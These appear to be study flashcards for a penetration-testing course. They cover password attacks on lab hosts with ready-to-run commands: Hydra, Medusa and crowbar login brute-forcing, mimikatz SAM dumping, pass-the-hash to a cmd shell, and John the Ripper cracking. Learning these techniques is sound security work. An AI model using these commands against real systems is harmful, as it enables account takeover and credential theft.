Password Attacks Flashcards
What is the name of the tool that creates a custom word list based on the website?
Give an example using it with the URL www.megacorpone.com
– cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
What is the name of the tool that is a fast password cracker with the ability to generate custom wordlists?
Where is the configuration file to alter password rules?
- John The Ripper
- /etc/john/john.conf
How would you add a rule to JTR that adds a 2 digit number to the end of each password?
- sudo vim /etc/john/john.conf
- $[0-9]$[0-9]
What is a wordlist generator provided with Kali that can create word lists based on specific password policies?
Crunch
What are the character placeholder translations for ‘crunch’?
- @ = lower case alpha characters
- , = upper case alpha characters
- % = numeric characters
- ^ = special characters including spaces
Use ‘crunch to create a word list that is 8 characters in length, and follows the password structure of [capital letter][2 x lower case letters][2 x special characters][3 x numeric characters]
– crunch 8 8 -t ,@@^^%%%
What are some risks with network service password attacks?
- noisy
- generate logs
- may lock accounts out
What command prepares the ‘rockyou’ word list for use?
– sudo gunzip /usr/share/wordlists/rockyou.txt.gz
What tool is best used for an HTTP htaccess password attack?
- Medusa
- THC-Hydra
How would you use Medusa to attack the ‘admin’ account on an HTTP server at 10.11.0.22 on the ‘/admin’ page, with the ‘rockyou’ word list?
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
What tool is recommended to for an RDP password attack?
- crowbar
How do you install ‘crowbar’?
- sudo apt install crowbar
What command would attempt an RDP password attack against 10.11.0.22/32 with the user ‘admin’ and password file ‘password-file.txt’?
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
What tool is recommended for SSH password attacks?
THC-Hydra
How would you use THC-Hydra for an SSH password attack against 10.11.0.22 with the ‘rockyou’ wordlist against the ‘admin’ user?
– hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.11.0.22
What tool is recommended or an HTTP Post password attack?
- THC-Hydra
What needs to be known for an HTTP Post password attack with Hydra?
- IP address
- URL of webpage containing the web form
- ‘condition string’ that indicates an unsuccessful login attempt (ex. INVALID LOGIN)
What is the best way to get the information required for Hydra for an HTTP Post password attack?
- view the page source on the login page
- this should show what page handles the POST request (ex. /form/frontpage.php)
What command should be used for an HTTP POST password attack with Hydra, given the following information:
- IP = 10.11.0.22
- POST URL = /form/frontpage.php
- user = admin
- condition string = ‘INVALID LOGIN’
- wordlist = rockyou
hydra 10.11.0.22 http-form-post “/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN” -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
What tool is recommended for identifying the type of hash?
hashid
Given a hash ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’ how would you check for possible hashing algorithms used to created this hash?
kali@kali:~$ hashid ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
Analyzing ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G
0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
[+] SHA-512 Crypt
What is a recommended website for looking up hashes?
HashKiller
On Windows, where are hashed user passwords stored?
- SAM
- Security Accounts Manager
What protective mechanism was implemented to protect against offline SAM database password attacks?
- SYSKEY
- Partially encrypts the SAM file
What is the recommended tool to extract hashes from Windows systems?
mimikatz
What does mimikatz do?
- Among other things, mimikatz facilitates password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached
- Since LSASS is a privileged process running under the SYSTEM user, we must launch mimikatz from an administrative command prompt
In order to extract password hashes with mimikatz, what three commands need to be run?
- privilege::debug = enables the SeDebugPrivilege access right required to tamper with another process
* ** If this command fails, mimikatz was most likely not executed with admin privs *** - token::elevate = elevates the security token from high integrity (administrator) to SYSTEM integrity
* ** LSASS is a SYSTEM process, which means it has even higher privileges than mimikatz running with admin privs *** - lsadump::sam = dumps the contents of the SAM database
What is pash-the-hash?
- allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a clear text password
- this is possible because NTLM/LM password hashes are not salted and remain static between sesssions
What tool is recommended for passing-the-hash?
pth-winexe
If we have extracted a hash ‘hashhashhash’ for user ‘offsec’, what command would we use from the attacking machine against 10.11.0.22 to get a ‘cmd’ shell?
pth-winexe -U offsec%hashhashhash //10.11.0.22 cmd
What tool is recommended for cracking hashes?
JTR
What command would we use to try cracking NT hashes in a file named hash.txt?
sudo john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt –format=NT
How would you use JTR to crack hashes on a Linux system?
- use the ‘unshadow’ utility to combine the ‘passwd’ and ‘shadow’ files from the compromised system
- -kali@kali:~$ unshadow passwd-file.txt shadow-file.txt - crack with JTR
- -kali@kali:~$ john –rules –wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
What hash crack tool is recommended if GPUs are available?
hashcat
